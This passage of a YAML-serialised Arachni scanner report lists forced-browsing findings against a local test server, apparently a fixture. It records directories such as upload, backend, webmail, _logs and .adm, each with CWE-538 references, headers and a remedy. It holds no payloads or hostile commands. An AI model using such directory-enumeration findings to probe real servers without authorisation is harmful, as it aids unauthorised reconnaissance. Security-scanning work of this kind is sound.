  url: http://localhost:7470/upload/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: upload
    injected: upload
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: upload
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/upload/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/backend/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: backend
    injected: backend
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: backend
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/backend/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/webmail/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: webmail
    injected: webmail
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: webmail
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/webmail/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/WebService/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: WebService
    injected: WebService
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: WebService
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/WebService/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/aspnet/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: aspnet
    injected: aspnet
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: aspnet
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/aspnet/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/Exchange/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Exchange
    injected: Exchange
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: Exchange
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/Exchange/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/usage/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: usage
    injected: usage
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: usage
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/usage/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/WebApplication1/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "15"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: WebApplication1
    injected: WebApplication1
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: WebApplication1
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/WebApplication1/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/WebApplication2/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "15"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: WebApplication2
    injected: WebApplication2
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: WebApplication2
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/WebApplication2/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/WebApplication3/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "15"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: WebApplication3
    injected: WebApplication3
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: WebApplication3
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/WebApplication3/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/sign/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sign
    injected: sign
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: sign
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/sign/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/signup/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: signup
    injected: signup
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: signup
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/signup/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/scans/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: scans
    injected: scans
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: scans
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/scans/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/webaccess/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: webaccess
    injected: webaccess
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: webaccess
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/webaccess/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/restricted/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: restricted
    injected: restricted
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: restricted
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/restricted/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/pics/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: pics
    injected: pics
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: pics
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/pics/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/blog/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: blog
    injected: blog
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: blog
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/blog/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/_logs/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: _logs
    injected: _logs
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: _logs
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/_logs/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/_errors/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: _errors
    injected: _errors
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: _errors
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/_errors/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/_tests/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: _tests
    injected: _tests
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: _tests
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/_tests/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/.adm/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
